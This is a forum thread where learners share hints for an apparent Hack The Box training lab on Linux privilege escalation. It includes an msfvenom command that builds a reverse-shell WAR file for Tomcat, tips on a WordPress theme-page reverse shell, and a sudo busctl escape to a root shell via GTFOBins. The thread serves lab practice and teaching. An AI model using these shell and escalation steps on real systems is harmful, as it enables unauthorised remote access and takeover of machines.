For anyone else getting stuck on getting flag5 - I’ve just spent the whole afternoon working this through and here are my tips (I used msf to get my initial shell with the t****t user:
Initiate a remote a secondary reverse shell from the msfconsole (I could not get the interactive tty to work from within msf);
Once you have your secondary shell (with nc), follow the instructions in the URL below to make the shell interactive. NOTE - if you are getting an error message about the terminal type being incorrect, skip the reset command and jump straight into the setting of the variables: Upgrading Simple Shells to Fully Interactive TTYs - ropnop blog
You should now be able to run your sudo command. If you get an error about the terminal not being fully functional, this step WON’T WORK!! Use the guidance in GTFOBins to provide the argument you need
If the last step is successful, you should end up with a line at the bottom prompting you about what line you are currently viewing - if the output you’ve received is complete you will need to reduce your stty row arguments until you do.
I hope this helps someone, happy to try and answer questions if anyone has any. I found this assessment pretty maddening!
Btw there is an alternate solution to this. If you check the version of ‘sudo’ running on the machine, you’ll quickly realize that it is vulnerable and there are exploits for it
Not able to find information relevant to user “barry” from “htb-student” user.
Checked the bash_history, checked the cache, config, everything.
Even went through the files in /var/www/html. Still unable to find anything which would give me access to “barry” account.
There’s a vhost running wordpress. You have to utilize a very basic attack, log in and fire a revshell by overwriting 404 page of a theme. This will land you a shell as www-data. From that point everything is the same as you were htb-student user.
This was helpful; thank you! To clarify a point that tripped me up.
Once you have an interactive shell as tomcat, you can run sudo busctl --show-machine.
You will get a warning here, too, about the terminal not being fully functional.
At this point, you can spawn a new shell as root using the command !/bin/sh as explained at busctl | GTFOBins.
From here, you can get flag5. If you want, you can upgrade this root shell too, but it isn’t necessary to navigate to /root/
Well done to anyone who gets up to flag5. It is relatively harder than the first four. If you need help, and you’re reading this within a few days of me posting it, feel free to message me (any later after that, and I’ve probably forgotten and moved on to other modules)
Note if you’re struggling to get a shell as tomcat (flag4)
Once you have the tomcatadm credentials, open up a browser and poke around. You can then pop a reverse shell by uploading a malicious war file.
No doubt you know how to do that if you’ve come this far but just in case, it can easily be done using msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=your-ip-address LPORT=your-port -f war > shell.war
Then you can simply deploy it through the Tomcat Web Application Manager page after you set up a listener nc -lvnp XXXX.
Hi, everyone. If you are stuck at the sudo busctl step, remember to type the gtfobins commands one after another without exiting the busctl program.
On that note, I’ve found every flag but flag1.txt. Even with root privileges searching the entire filesystem for hidden files it doesn’t show up anywhere other than in the htb-student’s log. Is it going to be in a generic container, or am I not on the right track?
It is the first flag, which means you shouldn’t have to elevate your privs in order to find it!
An educated guess would be by inspecting your own home folder, and recursively do the same for the folders you may encounter… anything which is unusual should be in your first priorities for searching.
In case you want to use the big guns, you could try find: find / flag1.txt 2>/dev/null
I remember I tried to script a little loop in this particular case: for i in {1..5}; do find / flag*.txt 2>/dev/null | grep flag$i; done
In case you can’t find a file, this is much probably because you do not have the required permissions with the current user. That’s why I couldn’t even list the flag5.txt file at first while even if I couldnt’ read the other flags, I could at least list them in their proper location… which ultimately gave me hints on how I could move laterally to target the right user to read the flags, one after another.
I hope this helps in understanding how these flags work in this exercise…
Thank you so much!
I cant believe it, the flag was right there in front of me. Funnily enough flag5 was the first flag I found and flag1 the last flag
But thanks again it did make me understand how the flag works here
I was on the last user account for so long and was looking for away to laterally move for hours cause that user never has these perms. I dunked myself.
